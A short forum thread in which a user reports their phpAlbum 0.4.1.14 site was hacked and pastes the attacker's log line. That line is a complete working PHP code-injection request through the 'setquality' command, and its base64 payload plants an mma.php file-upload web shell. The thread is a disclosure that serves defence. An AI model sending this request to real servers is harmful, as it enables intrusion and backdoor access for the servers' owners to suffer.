My phpAlbum hacked

My phpAlbum version 0.4.1.14 was hacked. No idea if this particular bug has already been fixed.

This is the offending line in the logs:

GET /phpAlbum/main.php?cmd=setquality&var1=1%27.eval(base64_decode($_REQUEST[x2])).%27&x2=JGZpbGVuYW1lID0gIm1tYS5waHAiOyAkY29udGVudCA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWldOb2J5QW5QR0krUEdKeVBqeGljajRuTG5Cb2NGOTFibUZ0WlNncExpYzhZbkkrUEM5aVBpYzdJR1ZqYUc4Z0p6eG1iM0p0SUdGamRHbHZiajBpSWlCdFpYUm9iMlE5SW5CdmMzUWlJR1Z1WTNSNWNHVTlJbTExYkhScGNHRnlkQzltYjNKdExXUmhkR0VpSUc1aGJXVTlJblZ3Ykc5aFpHVnlJaUJwWkQwaWRYQnNiMkZrWlhJaVBpYzdJR1ZqYUc4Z0p6eHBibkIxZENCMGVYQmxQU0ptYVd4bElpQnVZVzFsUFNKbWFXeGxJaUJ6YVhwbFBTSTFNQ0krUEdsdWNIVjBJRzVoYldVOUlsOTFjR3dpSUhSNWNHVTlJbk4xWW0xcGRDSWdhV1E5SWw5MWNHd2lJSFpoYkhWbFBTSlZjR3h2WVdRaVBqd3ZabTl5YlQ0bk95QnBaaWdnSkY5UVQxTlVXeWRmZFhCc0oxMGdQVDBnSWxWd2JHOWhaQ0lnS1NCN0lBbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajUxY0d4dlpDQmtNRzR6SUdsdUlGTkJUVVVnWm1sc1pTQXZMeUJVYURNZ1RVMUJJRnhjUEM5aVBqeGljajQ4WW5JK0p6c2dmU0FKWld4elpTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQkhRVWRCVENBaElTRThMMkkrUEdKeVBqeGljajRuT3lCOUlIMGdQejQ9Iik7ICRvcGVuID0gZm9wZW4oJGZpbGVuYW1lLCAiYSIpOyBpZihmd3JpdGUoJG9wZW4sICRjb250ZW50KSl7IGVjaG8gImRvbmUgISI7IH0=

I upgraded to 0.4.1.16, hope that fixes this hole.

thank you very much for

thank you very much for posting the link .. will try to fix this if not already done ...

any follow-ups about this?

any follow-ups about this?

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.


style="display:inline-block;width:468px;height:60px"
data-ad-client="ca-pub-8698264690166658"
data-ad-slot="4417389723">